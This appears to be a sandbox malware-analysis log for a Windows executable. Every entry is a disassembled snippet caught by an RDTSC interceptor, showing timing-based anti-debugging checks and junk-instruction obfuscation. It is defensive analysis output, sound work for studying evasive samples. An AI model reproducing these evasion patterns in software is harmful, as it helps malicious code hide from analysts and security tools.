Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E25 second address: 6D0E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E2A second address: 6D0E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CCE6B second address: 6CCE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC3507E5376h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E30 second address: 6D0E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CCE76 second address: 6CCEA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC3507E5386h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC3507E537Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E34 second address: 6D0E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E38 second address: 6D0E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC3507E5380h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D1E80 second address: 6D1EA9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FC350C3E72Bh 0x00000014 jmp 00007FC350C3E725h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D1EA9 second address: 6D1F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FC3507E5378h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FC3507E5378h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f je 00007FC3507E5393h 0x00000045 pushad 0x00000046 mov dword ptr [ebp+1246E893h], edi 0x0000004c call 00007FC3507E5384h 0x00000051 pop eax 0x00000052 popad 0x00000053 mov bx, EBDEh 0x00000057 push 00000000h 0x00000059 movzx ebx, bx 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FC3507E537Fh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D1F30 second address: 6D1F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FC350C3E734h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC350C3E722h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D2E90 second address: 6D2E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D4134 second address: 6D4139 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6DBDDA second address: 6DBDF6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC3507E537Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC3507E537Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6DBDF6 second address: 6DBE0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC350C3E716h 0x00000008 jmp 00007FC350C3E71Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6DB4CE second address: 6DB4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jg 00007FC3507E5376h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E1D45 second address: 6E1DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FC350C3E723h 0x00000013 jmp 00007FC350C3E720h 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push edi 0x0000001d jmp 00007FC350C3E724h 0x00000022 pop edi 0x00000023 jmp 00007FC350C3E720h 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E5962 second address: 6E5983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5389h 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6078 second address: 6E607C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E607C second address: 6E6082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6221 second address: 6E6235 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC350C3E71Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6235 second address: 6E6239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E638F second address: 6E63A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FC350C3E718h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E63A2 second address: 6E63A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6665 second address: 6E666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6A85 second address: 6E6AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC3507E5376h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FC3507E537Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jl 00007FC3507E5376h 0x0000001c pop eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6AAE second address: 6E6ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E722h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jnp 00007FC350C3E716h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6ACD second address: 6E6AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EF104 second address: 6EF108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EDCB8 second address: 6EDCC2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC3507E537Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EDCC2 second address: 6EDCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC350C3E71Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EDE9D second address: 6EDEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC3507E5382h 0x0000000c jnp 00007FC3507E537Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EE01F second address: 6EE071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FC350C3E729h 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FC350C3E723h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC350C3E729h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EE385 second address: 6EE38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EE939 second address: 6EE94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnl 00007FC350C3E720h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EE94E second address: 6EE95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC3507E5376h 0x0000000a jp 00007FC3507E5376h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EEAB9 second address: 6EEAEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Ch 0x00000007 jbe 00007FC350C3E722h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC350C3E722h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F24A3 second address: 6F24D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC3507E5382h 0x0000000e jmp 00007FC3507E5389h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F24D9 second address: 6F2505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FC350C3E724h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC350C3E71Dh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2505 second address: 6F250B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7098 second address: 6B709C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B709C second address: 6B70A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B70A2 second address: 6B70C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC350C3E71Ch 0x00000008 js 00007FC350C3E716h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FC350C3E718h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B70C5 second address: 6B70D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B70D7 second address: 6B7119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov cx, DCF2h 0x0000000d lea eax, dword ptr [ebp+1247BDA4h] 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC350C3E718h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, 6A21E9ECh 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7119 second address: 6B711D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B711D second address: 6B7127 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7127 second address: 6A1C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC3507E5378h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push ecx 0x00000025 mov edx, dword ptr [ebp+122D3A49h] 0x0000002b pop edx 0x0000002c call dword ptr [ebp+1245BB4Ch] 0x00000032 pushad 0x00000033 jmp 00007FC3507E5386h 0x00000038 push ebx 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7522 second address: 6B7528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7639 second address: 6B7672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007FC3507E5387h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7672 second address: 6B767C instructions: 0x00000000 rdtsc 0x00000002 js 00007FC350C3E71Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7724 second address: 6B776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FC3507E5382h 0x0000000b jmp 00007FC3507E537Ch 0x00000010 popad 0x00000011 add dword ptr [esp], 78EEC7CAh 0x00000018 mov di, 1200h 0x0000001c call 00007FC3507E5379h 0x00000021 je 00007FC3507E5394h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC3507E5382h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B776A second address: 6B778F instructions: 0x00000000 rdtsc 0x00000002 je 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC350C3E728h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B778F second address: 6B77AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5388h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B77AB second address: 6B77D1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jo 00007FC350C3E720h 0x00000016 pushad 0x00000017 jnc 00007FC350C3E716h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7908 second address: 6B7925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC3507E5385h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7A57 second address: 6B7A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E724h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7A79 second address: 6B7A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7A7D second address: 6B7A83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7A83 second address: 6B7AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5384h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC3507E5382h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7AB2 second address: 6B7AD5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FC350C3E724h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7AD5 second address: 6B7ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7B64 second address: 6B7B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7CB7 second address: 6B7CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC3507E5376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7CC1 second address: 6B7CD7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007FC350C3E71Eh 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7CD7 second address: 6B7D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007FC3507E5378h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 mov edx, dword ptr [ebp+122D3825h] 0x00000026 push 00000004h 0x00000028 sub cx, 9BF0h 0x0000002d nop 0x0000002e push esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC3507E537Fh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8108 second address: 6B810C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B810C second address: 6B8141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+12478FDCh], ecx 0x0000000e mov dword ptr [ebp+122D2151h], edx 0x00000014 push 0000001Eh 0x00000016 call 00007FC3507E5380h 0x0000001b movsx edx, bx 0x0000001e pop edi 0x0000001f push eax 0x00000020 jl 00007FC3507E5384h 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8141 second address: 6B8145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8248 second address: 6B824D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B83AC second address: 6B83E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007FC350C3E723h 0x0000000c pop ebx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 jmp 00007FC350C3E71Ch 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B83E1 second address: 6B83F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B84CB second address: 6B84D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B84D1 second address: 6B8545 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FC3507E5382h 0x00000010 lea eax, dword ptr [ebp+1247BDE8h] 0x00000016 jmp 00007FC3507E5381h 0x0000001b nop 0x0000001c jnc 00007FC3507E537Eh 0x00000022 push eax 0x00000023 jc 00007FC3507E5384h 0x00000029 jmp 00007FC3507E537Eh 0x0000002e nop 0x0000002f mov edx, dword ptr [ebp+122D2A33h] 0x00000035 lea eax, dword ptr [ebp+1247BDA4h] 0x0000003b jc 00007FC3507E5378h 0x00000041 mov ecx, esi 0x00000043 nop 0x00000044 pushad 0x00000045 pushad 0x00000046 pushad 0x00000047 popad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8545 second address: 6A2717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC350C3E71Dh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FC350C3E725h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jne 00007FC350C3E716h 0x0000001f popad 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007FC350C3E718h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c sub dword ptr [ebp+12470066h], ebx 0x00000042 call dword ptr [ebp+122D34EFh] 0x00000048 pushad 0x00000049 push eax 0x0000004a jmp 00007FC350C3E71Bh 0x0000004f pop eax 0x00000050 jmp 00007FC350C3E726h 0x00000055 push eax 0x00000056 push edx 0x00000057 jng 00007FC350C3E716h 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
